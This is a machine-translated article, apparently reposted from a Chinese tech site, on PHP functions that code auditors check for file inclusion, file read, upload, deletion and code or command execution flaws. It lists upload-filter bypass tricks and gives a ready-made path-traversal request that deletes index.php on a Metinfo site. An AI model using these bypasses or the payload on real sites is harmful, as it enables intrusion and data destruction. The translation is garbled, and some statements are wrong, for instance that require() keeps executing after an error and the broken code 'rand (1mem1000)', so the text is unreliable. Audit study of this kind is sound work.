Shulou(Shulou.com)05/31 Report--

Editor to share with you what are commonly used in code audit to lead to vulnerabilities, I believe that most people do not know much about it, so share this article for your reference, I hope you will learn a lot after reading this article. Let's learn about it!

1. The file contains

A. The local file contains

Include () contains up, contains down, and continues to execute downward if an error occurs

Include_once () is the same as above, including only once

Require () contains up, contains down, and executes down if an error occurs

Require_once () is the same as above, including only once

B. The remote file contains:

In the php.ini file

Allow_url_include = on

C, the file contains truncation

A, truncation (php version less than 5.3)

B, question mark truncation (after the question mark is equivalent to the requested parameter, pseudo truncation)

C, English. Backslash (/) truncation

2. File reading (download) vulnerabilities:

Search for key functions:

File_get_contents () highlight_file () fopen () opens the file read file () reads the file fread () fgetss () fgets () parse_ini_file () show_source () file () 3. File upload vulnerability:

Search for key functions:

Move_uploaded_file () then looks at whether the code calling this function exists to restrict the upload format or can be bypassed

(1) unfiltered or locally filtered:

The server side is not filtered, and the file in PHP format can be uploaded directly.

(2) blacklist extension filtering:

The limitation is not comprehensive enough: by default, IIS supports parsing .asp, .cdx, .asa, .cer, etc.

The extension can bypass:

(3) Whitespace bypass

The file format .php is not allowed, but we can upload the file name as 1.php (note that there is a space after it)

(4) Bypass of content-type verification in the header:

Getimagesize () function: verifies that as long as the file header is GIF89a, it will return true

To limit the value of $_ FILES ["file"] ["type"] is to artificially restrict content-type to be a controllable variable.

Guard against:

Use in_array () or use three equals = contrast extension

Save the uploaded file by renaming. The rule is to use a timestamp to concatenate random numbers: md5 (time () + rand (1mem1000)).

4. File deletion vulnerabilities (uncommon)

Search for key functions:

Unlink () uses the method of backtracking variables

The old version of session_destroy (), which can delete files, has been basically repaired.

Metinfo's arbitrary file deletion vulnerability $action = delete can delete .sql files. If the file is not sql, delete the submitted file name directly.

Target.com/recovery.php?&action=delete&filename=../../index.php

5. Code execution

Regular functions:

Eval () assert () preg_replace (), call_user_func (), call_user_func_array (), array_map ()

Array_filter passes each value in the array array to the callbach function in turn. If the callback function returns true, the current value of the array array will be included

Create_function

Usort: use a custom function to sort the array

${}: the middle php code will be parsed

Execute the function:

Preg_replace () function:

Mixed preg_replace (mixed $pattern, mixed $replacement, mixed $subject [, int $limit =-1 [, int & $count]])

When the e modifier is present at $pattern, $replacement is executed as php code

6. Command execution

Search for key functions:

System () exec () shell_exec () passthru () pcntl_exec () popen () proc_open () these are all the contents of the article "what are the vulnerabilities commonly used in code auditing that lead to vulnerabilities?" Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.